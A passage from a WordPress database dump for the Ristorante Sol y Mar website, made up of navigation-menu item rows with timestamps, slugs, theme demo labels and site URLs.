17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4038/',2,'nav_menu_item','',0),(4039,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4039','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4039/',34,'nav_menu_item','',0),(4040,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4040','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4040/',42,'nav_menu_item','',0),(4041,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4041','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4041/',43,'nav_menu_item','',0),(4042,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4042','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4042/',41,'nav_menu_item','',0),(4043,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4043','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',3039,'https://www.ristorantesolymar.it/2021/01/23/4043/',96,'nav_menu_item','',0),(4044,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4044','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',3039,'https://www.ristorantesolymar.it/2021/01/23/4044/',52,'nav_menu_item','',0),(4045,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4045','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4045/',2,'nav_menu_item','',0),(4046,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4046','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4046/',11,'nav_menu_item','',0),(4047,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4047','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4047/',9,'nav_menu_item','',0),(4048,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4048','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4048/',10,'nav_menu_item','',0),(4049,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4049','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4049/',20,'nav_menu_item','',0),(4050,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4050','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4050/',16,'nav_menu_item','',0),(4051,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4051','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4051/',4,'nav_menu_item','',0),(4052,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4052','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4052/',3,'nav_menu_item','',0),(4053,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4053','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4053/',4,'nav_menu_item','',0),(4054,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4054','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4054/',3,'nav_menu_item','',0),(4055,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4055','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4055/',12,'nav_menu_item','',0),(4056,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4056','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4056/',19,'nav_menu_item','',0),(4057,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4057','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4057/',44,'nav_menu_item','',0),(4058,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4058','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4058/',13,'nav_menu_item','',0),(4059,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4059','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4059/',13,'nav_menu_item','',0),(4060,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4060','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',3034,'https://www.ristorantesolymar.it/2021/01/23/4060/',7,'nav_menu_item','',0),(4061,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4061','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',3034,'https://www.ristorantesolymar.it/2021/01/23/4061/',6,'nav_menu_item','',0),(4062,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4062','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',3034,'https://www.ristorantesolymar.it/2021/01/23/4062/',5,'nav_menu_item','',0),(4063,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4063','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',3034,'https://www.ristorantesolymar.it/2021/01/23/4063/',18,'nav_menu_item','',0),(4064,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4064','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',3034,'https://www.ristorantesolymar.it/2021/01/23/4064/',39,'nav_menu_item','',0),(4065,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4065','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',3034,'https://www.ristorantesolymar.it/2021/01/23/4065/',38,'nav_menu_item','',0),(4066,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4066','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',3034,'https://www.ristorantesolymar.it/2021/01/23/4066/',37,'nav_menu_item','',0),(4067,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4067','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4067/',14,'nav_menu_item','',0),(4068,1,'2021-01-23 18:36:14','2021-01-23 17:36:14',' ','','','publish','closed','closed','','4068','','','2021-01-23 18:36:14','2021-01-23 17:36:14','',0,'https://www.ristorantesolymar.it/2021/01/23/4068/',21,'nav_menu_item','',0),(4069,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4069','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4069/',15,'nav_menu_item','',0),(4070,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4070','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4070/',16,'nav_menu_item','',0),(4071,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4071','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4071/',2,'nav_menu_item','',0),(4072,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4072','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4072/',3,'nav_menu_item','',0),(4073,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4073','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4073/',2,'nav_menu_item','',0),(4074,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4074','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4074/',2,'nav_menu_item','',0),(4075,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4075','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4075/',18,'nav_menu_item','',0),(4076,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4076','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4076/',9,'nav_menu_item','',0),(4077,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4077','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4077/',9,'nav_menu_item','',0),(4078,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4078','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4078/',5,'nav_menu_item','',0),(4079,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4079','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4079/',7,'nav_menu_item','',0),(4080,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4080','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4080/',7,'nav_menu_item','',0),(4081,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4081','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4081/',5,'nav_menu_item','',0),(4082,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4082','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4082/',5,'nav_menu_item','',0),(4083,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4083','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4083/',12,'nav_menu_item','',0),(4084,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4084','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4084/',19,'nav_menu_item','',0),(4085,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4085','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4085/',17,'nav_menu_item','',0),(4086,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4086','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4086/',20,'nav_menu_item','',0),(4087,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4087','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4087/',8,'nav_menu_item','',0),(4088,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4088','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4088/',8,'nav_menu_item','',0),(4089,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4089','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4089/',4,'nav_menu_item','',0),(4090,1,'2021-01-23 18:36:15','2021-01-23 17:36:15','','Four Columns Wide','','publish','closed','closed','','four-columns-wide-7','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',3061,'https://www.ristorantesolymar.it/2021/01/23/four-columns-wide-7/',57,'nav_menu_item','',0),(4091,1,'2021-01-23 18:36:15','2021-01-23 17:36:15','','Four Columns','','publish','closed','closed','','four-columns-7','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',3061,'https://www.ristorantesolymar.it/2021/01/23/four-columns-7/',56,'nav_menu_item','',0),(4092,1,'2021-01-23 18:36:15','2021-01-23 17:36:15','','Three Columns','','publish','closed','closed','','three-columns-7','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',3061,'https://www.ristorantesolymar.it/2021/01/23/three-columns-7/',55,'nav_menu_item','',0),(4093,1,'2021-01-23 18:36:15','2021-01-23 17:36:15','','Big Slider','','publish','closed','closed','','big-slider-7','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/big-slider-7/',65,'nav_menu_item','',0),(4094,1,'2021-01-23 18:36:15','2021-01-23 17:36:15','','Small Images','','publish','closed','closed','','small-images-7','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/small-images-7/',64,'nav_menu_item','',0),(4095,1,'2021-01-23 18:36:15','2021-01-23 17:36:15','','Big Images','','publish','closed','closed','','big-images-7','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/big-images-7/',63,'nav_menu_item','',0),(4096,1,'2021-01-23 18:36:15','2021-01-23 17:36:15','','Big Gallery','','publish','closed','closed','','big-gallery-7','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/big-gallery-7/',67,'nav_menu_item','',0),(4097,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4097','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4097/',6,'nav_menu_item','',0),(4098,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4098','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',0,'https://www.ristorantesolymar.it/2021/01/23/4098/',6,'nav_menu_item','',0),(4099,1,'2021-01-23 18:36:15','2021-01-23 17:36:15',' ','','','publish','closed','closed','','4099','','','2021-01-23 18:36:15','2021-01-23 17:36:15','',3039,'https://www.ristorantesolymar.it/2021/01/23/4099/',70,'nav_menu_item','',0),(4100,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4100','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4100/',97,'nav_menu_item','',0),(4101,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4101','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4101/',98,'nav_menu_item','',0),(4102,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4102','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4102/',26,'nav_menu_item','',0),(4103,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4103','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4103/',53,'nav_menu_item','',0),(4104,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4104','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4104/',54,'nav_menu_item','',0),(4105,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4105','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4105/',27,'nav_menu_item','',0),(4106,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4106','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4106/',71,'nav_menu_item','',0),(4107,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4107','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4107/',73,'nav_menu_item','',0),(4108,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4108','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4108/',29,'nav_menu_item','',0),(4109,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4109','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4109/',43,'nav_menu_item','',0),(4110,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4110','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4110/',36,'nav_menu_item','',0),(4111,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4111','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4111/',44,'nav_menu_item','',0),(4112,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4112','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4112/',80,'nav_menu_item','',0),(4113,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4113','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4113/',88,'nav_menu_item','',0),(4114,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4114','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4114/',87,'nav_menu_item','',0),(4115,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4115','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4115/',79,'nav_menu_item','',0),(4116,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4116','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4116/',35,'nav_menu_item','',0),(4117,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4117','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4117/',30,'nav_menu_item','',0),(4118,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4118','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4118/',74,'nav_menu_item','',0),(4119,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4119','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4119/',81,'nav_menu_item','',0),(4120,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4120','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4120/',37,'nav_menu_item','',0),(4121,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4121','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4121/',28,'nav_menu_item','',0),(4122,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4122','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4122/',47,'nav_menu_item','',0),(4123,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4123','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4123/',72,'nav_menu_item','',0),(4124,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4124','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',3039,'https://www.ristorantesolymar.it/2021/01/23/4124/',91,'nav_menu_item','',0),(4125,1,'2021-01-23 18:36:16','2021-01-23 17:36:16',' ','','','publish','closed','closed','','4125','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',0,'https://www.ristorantesolymar.it/2021/01/23/4125/',23,'nav_menu_item','',0),(4126,1,'2021-01-23 18:36:16','2021-01-23 17:36:16','','Standard','','publish','closed','closed','','standard-3','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',0,'https://www.ristorantesolymar.it/2021/01/23/standard-3/',27,'nav_menu_item','',0),(4127,1,'2021-01-23 18:36:16','2021-01-23 17:36:16','','Gallery','','publish','closed','closed','','gallery-3','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',0,'https://www.ristorantesolymar.it/2021/01/23/gallery-3/',28,'nav_menu_item','',0),(4128,1,'2021-01-23 18:36:16','2021-01-23 17:36:16','','Link','','publish','closed','closed','','link-3','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',0,'https://www.ristorantesolymar.it/2021/01/23/link-3/',29,'nav_menu_item','',0),(4129,1,'2021-01-23 18:36:16','2021-01-23 17:36:16','','Quote','','publish','closed','closed','','quote-3','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',0,'https://www.ristorantesolymar.it/2021/01/23/quote-3/',30,'nav_menu_item','',0),(4130,1,'2021-01-23 18:36:16','2021-01-23 17:36:16','','Video','','publish','closed','closed','','video-3','','','2021-01-23 18:36:16','2021-01-23 17:36:16','',0,'https://www.ristorantesolymar.it/2021/01/23/video-3/',31,'nav_menu_item','',0),(4131,1,'2021-01-23 18:36:17','2021-01-23 17:36:17','','Audio','','publish','closed','closed','','audio-3','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',0,'https://www.ristorantesolymar.it/2021/01/23/audio-3/',32,'nav_menu_item','',0),(4132,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4132','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',3039,'https://www.ristorantesolymar.it/2021/01/23/4132/',82,'nav_menu_item','',0),(4133,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4133','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',3039,'https://www.ristorantesolymar.it/2021/01/23/4133/',38,'nav_menu_item','',0),(4134,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4134','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',3039,'https://www.ristorantesolymar.it/2021/01/23/4134/',75,'nav_menu_item','',0),(4135,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4135','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',3039,'https://www.ristorantesolymar.it/2021/01/23/4135/',31,'nav_menu_item','',0),(4136,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4136','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',0,'https://www.ristorantesolymar.it/2021/01/23/4136/',5,'nav_menu_item','',0),(4137,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4137','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',0,'https://www.ristorantesolymar.it/2021/01/23/4137/',3,'nav_menu_item','',0),(4138,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4138','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',3039,'https://www.ristorantesolymar.it/2021/01/23/4138/',92,'nav_menu_item','',0),(4139,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4139','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',3039,'https://www.ristorantesolymar.it/2021/01/23/4139/',99,'nav_menu_item','',0),(4140,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4140','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',3039,'https://www.ristorantesolymar.it/2021/01/23/4140/',48,'nav_menu_item','',0),(4141,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4141','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',3039,'https://www.ristorantesolymar.it/2021/01/23/4141/',55,'nav_menu_item','',0),(4142,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4142','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',0,'https://www.ristorantesolymar.it/2021/01/23/4142/',7,'nav_menu_item','',0),(4143,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4143','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',0,'https://www.ristorantesolymar.it/2021/01/23/4143/',10,'nav_menu_item','',0),(4144,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4144','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',0,'https://www.ristorantesolymar.it/2021/01/23/4144/',8,'nav_menu_item','',0),(4145,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4145','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',0,'https://www.ristorantesolymar.it/2021/01/23/4145/',9,'nav_menu_item','',0),(4146,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4146','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',3061,'https://www.ristorantesolymar.it/2021/01/23/4146/',12,'nav_menu_item','',0),(4147,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4147','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',3061,'https://www.ristorantesolymar.it/2021/01/23/4147/',13,'nav_menu_item','',0),(4148,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4148','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',3061,'https://www.ristorantesolymar.it/2021/01/23/4148/',14,'nav_menu_item','',0),(4149,1,'2021-01-23 18:36:17','2021-01-23 17:36:17','','Standard List','','publish','closed','closed','','standard-list-7','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',0,'https://www.ristorantesolymar.it/2021/01/23/standard-list-7/',16,'nav_menu_item','',0),(4150,1,'2021-01-23 18:36:17','2021-01-23 17:36:17','','Blog Standard','','publish','closed','closed','','blog-standard-3','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',0,'https://www.ristorantesolymar.it/2021/01/23/blog-standard-3/',17,'nav_menu_item','',0),(4151,1,'2021-01-23 18:36:17','2021-01-23 17:36:17','','Blog Gallery','','publish','closed','closed','','blog-gallery-3','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',0,'https://www.ristorantesolymar.it/2021/01/23/blog-gallery-3/',18,'nav_menu_item','',0),(4152,1,'2021-01-23 18:36:17','2021-01-23 17:36:17','','Blog Standard','','publish','closed','closed','','blog-standard-4','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',0,'https://www.ristorantesolymar.it/2021/01/23/blog-standard-4/',13,'nav_menu_item','',0),(4153,1,'2021-01-23 18:36:17','2021-01-23 17:36:17','','Blog Gallery','','publish','closed','closed','','blog-gallery-4','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',0,'https://www.ristorantesolymar.it/2021/01/23/blog-gallery-4/',14,'nav_menu_item','',0),(4154,1,'2021-01-23 18:36:17','2021-01-23 17:36:17','','Standard List','','publish','closed','closed','','standard-list-8','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',0,'https://www.ristorantesolymar.it/2021/01/23/standard-list-8/',12,'nav_menu_item','',0),(4155,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4155','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',0,'https://www.ristorantesolymar.it/2021/01/23/4155/',7,'nav_menu_item','',0),(4156,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4156','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',0,'https://www.ristorantesolymar.it/2021/01/23/4156/',8,'nav_menu_item','',0),(4157,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4157','','','2021-01-23 18:36:17','2021-01-23 17:36:17','',0,'https://www.ristorantesolymar.it/2021/01/23/4157/',9,'nav_menu_item','',0),(4158,1,'2021-01-23 18:36:17','2021-01-23 17:36:17',' ','','','publish','closed','closed','','4158','','','2021-01-23 